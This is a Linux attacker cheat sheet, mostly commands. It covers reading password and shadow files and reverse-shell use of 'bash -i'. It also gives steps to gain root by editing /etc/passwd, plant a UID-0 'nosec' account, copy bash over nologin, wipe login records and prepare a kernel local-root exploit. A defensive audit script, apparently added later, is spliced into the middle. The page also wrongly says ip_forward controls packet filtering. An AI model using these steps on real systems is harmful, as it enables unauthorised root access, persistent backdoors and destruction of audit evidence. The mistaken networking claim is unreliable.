cat /etc/passwd // view Linux users
cat /etc/shadow // view user passwords; root permission is required
cat /etc/sysconfig/network-scripts/ifcfg-ethN // N is the NIC number; view the NIC's IP information
ifconfig // view the local machine's IP information
cat /etc/resolv.conf // view DNS information
bash -i // can be used in a reverse shell so that commands are displayed intuitively
Bash prompt: when you enter as a normal restricted user, you usually have a prompt similar to bash$. When you log in as root, your prompt becomes bash#.
System variables: try echo $USER / echo $EUID. The system will tell you which user it thinks you are.
echo 1 > /proc/sys/net/ipv4/if_forward is wrong; it should be echo 1 > /proc/sys/net/ipv4/ip_forward
vim /proc/sys/net/ipv4/ip_forward // the default value is 0, that is, the kernel does not filter data packets; change it to 1 to let the kernel filter data packets!
netstat -an | grep LISTEN | grep :80 // view the port
service --status-all | grep running
service --status-all | grep http
// view running services
lsb_release -a // view the system version
Restart the ssh service:
service sshd stop
service sshd start
In the sshd_config file, change
PasswordAuthentication no
to
PasswordAuthentication yes
to allow remote ssh login. Otherwise, "Access denied" is displayed.
UsePAM yes may be used to establish the PAM login method, for example when connecting by ssh from other Linux hosts to the server. If it is disabled, it cannot be enabled.
su: beginner usage
First: chmod 777 /etc/passwd
Then modify the bin user's gid and uid to 0.
Then use passwd to set the bin user's password.
Then: cp /bin/bash /sbin/nologin
Then su - bin can be used to get a root shell.
The principle: this is for when ssh does not allow the root user to log in at the ssh terminal and we do not know the root password.
You can also use:
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c -o local -static -Wall
echo nosec:x:0:0://bin/sh > /etc/passwd
echo nosec:-1:-1:-1:-1:-1:-1:- > /etc/shadow
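A defender's view of the account changes described above, as an added example that is not part of the original page: a small shell audit that flags non-root accounts with UID 0, a world-writable passwd file, and a nologin binary identical to a shell. The function names and the sample passwd content are constructed for illustration.

```shell
# Added audit example; not code from the original page.
# Function names are hypothetical and the sample passwd data is constructed.

# Print every account other than root whose UID field is 0.
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Succeed if the file is writable by "other" (as after chmod 777).
world_writable() {
    [ -n "$(find "$1" -prune -perm -0002 2>/dev/null)" ]
}

# Succeed if both files exist and are byte-identical
# (as when a shell has been copied over /sbin/nologin).
same_content() {
    cmp -s "$1" "$2" 2>/dev/null
}

# audit PASSWD NOLOGIN SHELL: print findings, return 1 if there are any.
audit() {
    rc=0
    for u in $(uid0_accounts "$1"); do
        echo "ALERT: non-root account with UID 0: $u"; rc=1
    done
    if world_writable "$1"; then
        echo "ALERT: $1 is world-writable"; rc=1
    fi
    if same_content "$2" "$3"; then
        echo "ALERT: $2 is identical to $3"; rc=1
    fi
    return $rc
}

# Constructed sample reflecting the edits described above.
write_sample() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:0:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
nosec:x:0:0::/:/bin/sh
EOF
}

# Demo on the constructed sample; on a real host run:
#   audit /etc/passwd /sbin/nologin /bin/bash
d=$(mktemp -d) && write_sample "$d/passwd" && chmod 777 "$d/passwd"
audit "$d/passwd" /sbin/nologin /bin/bash || echo "findings reported"
rm -rf "$d"
```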
Clear the last record: cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 // create a large file, to be used in privilege escalation with the Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit.